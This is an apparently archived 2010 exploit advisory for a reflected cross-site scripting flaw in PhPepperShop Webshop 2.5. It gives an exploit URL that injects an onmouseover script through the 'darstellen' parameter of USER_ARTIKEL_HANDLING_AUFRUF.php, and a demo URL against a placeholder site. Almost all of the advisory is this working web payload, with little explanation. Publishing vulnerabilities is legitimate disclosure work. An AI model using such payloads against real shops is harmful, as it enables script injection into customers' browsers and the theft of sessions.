PhPepperShop Webshop 2.5 Cross Site Scripting

2010-01-1200:00:00
Crux
packetstormsecurity.com
JSON
`  
  
==============================================================================  
[~] PhPepperShop Webshop 2.5 (XSS) Cross Site Scripting Vulnerability  
==============================================================================  
[+] My home [ http://hack-tech.com ]  
[+] Date Submitted: [ January 12 2010 ]  
[+] Founder: [ Crux ]  
[+] Vendor: [ http://www.phpeppershop.com/ ]  
[+] Version: [ 2.5.1 ]  
[+] Greetz: [ HT Team, All maldivians and my love <3 ]  
[+] Dork: [ NO NO NO! ]  
###############################################################################  
  
[ EXPLOIT ]  
  
[Path]/USER_ARTIKEL_HANDLING_AUFRUF.php?darstellen=1\"+onmouseover%3Dalert(411780276689)+&lowlimit=0&highlimit=15&bilderanzeigen=true&Suchstring=111-222-1933email%40address.tst&javascript_enabled=true&PEPPERSESS=d0499c7999470455b75dc23b45e7fb1b&w=1280&h=971  
  
  
[ DEMO ]  
  
http://site.com/shop/USER_ARTIKEL_HANDLING_AUFRUF.php?darstellen=1\"+onmouseover%3Dalert(411780276689)+&lowlimit=0&highlimit=15&bilderanzeigen=true&Suchstring=111-222-1933email%40address.tst&javascript_enabled=true&PEPPERSESS=d0499c7999470455b75dc23b45e7fb1b&w=1280&h=971  
  
==============================================================================  
  
  
###############################################################################  
~ There is no right and wrong, There's only fun and boring. :-) ~ Crux  
###############################################################################  
  
  
________________________________  
Windows Live Hotmail: Your friends can get your Facebook updates, right from Hotmail®.<http://www.microsoft.com/middleeast/windows/windowslive/see-it-in-action/social-network-basics.aspx?ocid=PID23461::T:WLMTAGL:ON:WL:en-xm:SI_SB_4:092009>  
  
  
  
`
JSON